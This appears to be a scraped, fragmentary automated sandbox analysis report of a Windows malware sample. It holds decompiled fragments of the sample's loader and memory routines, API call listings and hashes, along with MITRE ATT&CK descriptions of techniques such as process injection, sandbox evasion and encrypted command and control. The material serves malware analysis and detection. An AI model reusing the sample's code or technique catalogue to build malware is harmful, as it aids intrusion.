Part of subcall function 004018A0: LoadLibraryA.KERNELBASE(?,?,00000000), ref: 004018D8
Part of subcall function 004018A0: GetProcAddress.KERNEL32(00000000,Shel), ref: 004018E4

Strings

32, xrefs: 00401F63

Memory Dump Source

Source File: 00000000.00000002.199766581.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199762788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199773116.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199778321.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199781770.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199786237.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc$ConsoleFileModuleNameWindow
String ID: 32
API String ID: 3324019085-2103780943
Opcode ID: 46aac531217d429e880bb880db5e2a59e10f4db92b5c2f864625b5ee7c2b489c
Instruction ID: 9c7f662852b17ace4882b67a1fc9ec7ac7ebf9080a2010151e3d34f37eda0402
Opcode Fuzzy Hash: 46aac531217d429e880bb880db5e2a59e10f4db92b5c2f864625b5ee7c2b489c
Instruction Fuzzy Hash: 6AF05475940302ABE300DF50DD89B5A7794AB54744F84893DBA48A22E0F7FCD544865A

Uniqueness

Uniqueness Score: -1.00%

Function 00406CC3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00406CC3() {
				int _t12;
				int _t13;
				void* _t20;

				 *(_t20 - 4) =  *(_t20 - 4) | 0xffffffff;
				if(0 == 0) {
					L4:
					_t12 = 0;
				} else {
					_t13 = MultiByteToWideChar( *(_t20 + 0x18), 1,  *(_t20 + 0xc),  *(_t20 + 0x10), 0,  *(_t20 - 0x20));
					if(_t13 == 0) {
						goto L4;
					} else {
						_t8 = _t20 + 0x14; // 0x406d69
						_t12 = GetStringTypeW( *(_t20 + 8), 0, _t13,  *_t8);
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t20 - 0x10));
				return _t12;
			}

0x00406cca
0x00406cd0
0x00406cfb
0x00406cfb
0x00406cd2
0x00406ce1
0x00406ce9
0x00000000
0x00406ceb
0x00406ceb
0x00406cf3
0x00406cf3
0x00406ce9
0x00406d03
0x00406d0e

APIs

MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,00406D69,?), ref: 00406CE1
GetStringTypeW.KERNEL32(?,?,00000000,im@,?,?,?,?,?,?,00406D69,?), ref: 00406CF3

Strings

im@, xrefs: 00406CEB

Memory Dump Source

Source File: 00000000.00000002.199766581.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199762788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199773116.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199778321.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199781770.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199786237.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiStringTypeWide
String ID: im@
API String ID: 3139900361-516455879
Opcode ID: 3cd6e0a5aaf87e07ac5ee2da931a4589a6c4811af2752385156a542494a200fd
Instruction ID: 564194b5015e2fc2ecc946433a2d3ddff2ed3db4410f5c97252a60bdef1d7f9a
Opcode Fuzzy Hash: 3cd6e0a5aaf87e07ac5ee2da931a4589a6c4811af2752385156a542494a200fd
Instruction Fuzzy Hash: CAF03A32505119ABCF218F80DE459DEBB36FB04360F014539FA52711A0C7354920AA94

Uniqueness

Uniqueness Score: -1.00%

Function 00401000, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401000(CHAR* _a4) {
				intOrPtr _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _t4;
				CHAR* _t8;

				_t4 =  *0x40cf4c; // 0x74af0000
				 *_t8 = 0x4e52454b;
				_v8 = 0x32334c45;
				_v4 = 0;
				if(_t4 == 0) {
					_t4 = LoadLibraryA(_t8);
					 *0x40cf4c = _t4;
				}
				return GetProcAddress(_t4, _a4);
			}

0x00401003
0x00401008
0x00401012
0x0040101a
0x00401022
0x00401029
0x0040102f
0x0040102f
0x00401043

APIs

LoadLibraryA.KERNEL32(74AF0000,?,?,?,?,?,?,?,?,?,00401F7B), ref: 00401029
GetProcAddress.KERNEL32(74AF0000,?), ref: 0040103A

Strings

EL32, xrefs: 00401012

Memory Dump Source

Source File: 00000000.00000002.199766581.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199762788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199773116.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199778321.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199781770.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199786237.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: EL32
API String ID: 2574300362-3367122695
Opcode ID: 2ae5c11028faa6d09cc1856fc149f88123bfbf338145613ffade19823f03ab3e
Instruction ID: e57299af7337993e7b686878eb83ed0512805ea50c4953b9a9f89a59caef0946
Opcode Fuzzy Hash: 2ae5c11028faa6d09cc1856fc149f88123bfbf338145613ffade19823f03ab3e
Instruction Fuzzy Hash: 39E0B6B4505341AFC740DF68EB4871A7BE8BB84304F40897DEA89D7250DB34D5488F1B

Uniqueness

Uniqueness Score: -1.00%

Function 00404751, Relevance: 5.1, APIs: 4, Instructions: 53
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404751() {
				signed int _t15;
				void* _t17;
				void* _t19;
				void* _t25;
				signed int _t26;
				void* _t27;
				intOrPtr* _t29;

				_t15 =  *0x40d518; // 0x0
				_t26 =  *0x40d508; // 0x0
				if(_t15 != _t26) {
					L3:
					_t27 =  *0x40d51c; // 0x0
					_t29 = _t27 + (_t15 + _t15 * 4) * 4;
					_t17 = HeapAlloc( *0x40d524, 8, 0x41c4);
					 *(_t29 + 0x10) = _t17;
					if(_t17 == 0) {
						L6:
						return 0;
					}
					_t19 = VirtualAlloc(0, 0x100000, 0x2000, 4);
					 *(_t29 + 0xc) = _t19;
					if(_t19 != 0) {
						 *(_t29 + 8) =  *(_t29 + 8) | 0xffffffff;
						 *_t29 = 0;
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *0x40d518 =  *0x40d518 + 1;
						 *( *(_t29 + 0x10)) =  *( *(_t29 + 0x10)) | 0xffffffff;
						return _t29;
					}
					HeapFree( *0x40d524, 0,  *(_t29 + 0x10));
					goto L6;
				}
				_t2 = _t26 * 4; // 0x50
				_t25 = HeapReAlloc( *0x40d524, 0,  *0x40d51c, _t26 + _t2 + 0x50 << 2);
				if(_t25 == 0) {
					goto L6;
				}
				 *0x40d508 =  *0x40d508 + 0x10;
				 *0x40d51c = _t25;
				_t15 =  *0x40d518; // 0x0
				goto L3;
			}

0x00404751
0x00404756
0x00404762
0x00404794
0x00404794
0x004047aa
0x004047ad
0x004047b5
0x004047b8
0x004047e4
0x00000000
0x004047e4
0x004047c7
0x004047cf
0x004047d2
0x004047e8
0x004047ec
0x004047ee
0x004047f1
0x004047fa
0x00000000
0x004047fd
0x004047de
0x00000000
0x004047de
0x00404764
0x00404779
0x00404781
0x00000000
0x00000000
0x00404783
0x0040478a
0x0040478f
0x00000000

APIs

HeapReAlloc.KERNEL32(00000000,00000050,00000000,00000000,00404519,00000000,00000000,00000000,0040293C,00000000,00000000,?,00000000,00000000,00000000), ref: 00404779
HeapAlloc.KERNEL32(00000008,000041C4,00000000,00000000,00404519,00000000,00000000,00000000,0040293C,00000000,00000000,?,00000000,00000000,00000000), ref: 004047AD
VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004), ref: 004047C7
HeapFree.KERNEL32(00000000,?), ref: 004047DE

Memory Dump Source

Source File: 00000000.00000002.199766581.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199762788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199773116.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199778321.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199781770.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199786237.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocHeap$FreeVirtual
String ID:
API String ID: 3499195154-0
Opcode ID: ff238c7abc86e0ade8ea29734b33f15928545eb4314a05c50a12ed12f92fa091
Instruction ID: 095bf6690fcbbba6fa0084d70a26aec3343d26e274735dbfcb47fc39b3aaabbe
Opcode Fuzzy Hash: ff238c7abc86e0ade8ea29734b33f15928545eb4314a05c50a12ed12f92fa091
Instruction Fuzzy Hash: 6D118274A00200BFC7309F59EE45D22BBB1F79A718711453EE651E71B0C731994ACF18

Uniqueness

Uniqueness Score: -1.00%

Function 004052C0, Relevance: 5.0, APIs: 4, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004052C0(void* __eax) {
				void* _t1;

				_t1 = __eax;
				InitializeCriticalSection( *0x40c2b4);
				InitializeCriticalSection( *0x40c2a4);
				InitializeCriticalSection( *0x40c294);
				InitializeCriticalSection( *0x40c274);
				return _t1;
			}

0x004052c0
0x004052cd
0x004052d5
0x004052dd
0x004052e5
0x004052e8

APIs

InitializeCriticalSection.KERNEL32(?,00403262,?,004026FE), ref: 004052CD
InitializeCriticalSection.KERNEL32(?,00403262,?,004026FE), ref: 004052D5
InitializeCriticalSection.KERNEL32(?,00403262,?,004026FE), ref: 004052DD
InitializeCriticalSection.KERNEL32(?,00403262,?,004026FE), ref: 004052E5

Memory Dump Source

Source File: 00000000.00000002.199766581.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199762788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199773116.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199778321.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199781770.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199786237.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalInitializeSection
String ID:
API String ID: 32694325-0
Opcode ID: 51868eb20ad439a3be905c2bcae9f0149217b81578f7f253b405c5c77d8d41f1
Instruction ID: c45305cb3e823c81d6ea6f37651147a6e0c3b892bf36741c7ff915a60156b057
Opcode Fuzzy Hash: 51868eb20ad439a3be905c2bcae9f0149217b81578f7f253b405c5c77d8d41f1
Instruction Fuzzy Hash: AFC00231C01035DBCE123BA5FF858463F26EB0526070502BBA108718308A711C11DFC8

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report TMB1fxNaqR

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTPS Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

Behavior

Function 004018A0, Relevance: 24.6, APIs: 3, Strings: 11, Instructions: 51
libraryloaderCOMMON

Function 0040268E, Relevance: 3.1, APIs: 2, Instructions: 68
COMMON

Function 004053C0, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 00401ED0, Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 32
libraryloaderCOMMON

Function 00403AB1, Relevance: 7.6, APIs: 5, Instructions: 150
COMMON

Function 00403430, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51
COMMON

Function 00403DE2, Relevance: 3.0, APIs: 2, Instructions: 30
memoryCOMMON

Function 004028EE, Relevance: 1.6, APIs: 1, Instructions: 80
memoryCOMMON

Function 00401050, Relevance: 82.7, APIs: 22, Strings: 25, Instructions: 457
memorystringcomCOMMON

Function 004048FD, Relevance: .3, Instructions: 259
COMMONCrypto

Function 00401FD0, Relevance: 75.3, APIs: 3, Strings: 40, Instructions: 99
stringCOMMON

Function 00401980, Relevance: 56.3, APIs: 18, Strings: 14, Instructions: 325
libraryfilestringCOMMON

Function 00406977, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 177
COMMON

Function 0040397F, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 132
COMMON

Function 004065CF, Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50
libraryloaderCOMMON

Function 00406BC6, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 117
COMMON

Function 00403F59, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100
fileCOMMON

Function 00403C9A, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115
COMMON

Function 004076F0, Relevance: 7.5, APIs: 5, Instructions: 45
memorystringCOMMON

Function 004032C3, Relevance: 7.5, APIs: 5, Instructions: 38
threadCOMMON

Function 00406A8B, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51
COMMON

Function 00407314, Relevance: 6.5, APIs: 5, Instructions: 278
COMMON

Function 00404BF3, Relevance: 6.4, APIs: 5, Instructions: 102
memoryCOMMON

Function 00405D0E, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124
COMMON

Function 00401F50, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30
libraryCOMMON

Function 00406CC3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29
COMMON

Function 00401000, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17
libraryloaderCOMMON

Function 00404751, Relevance: 5.1, APIs: 4, Instructions: 53
memoryCOMMON

Function 004052C0, Relevance: 5.0, APIs: 4, Instructions: 12
COMMON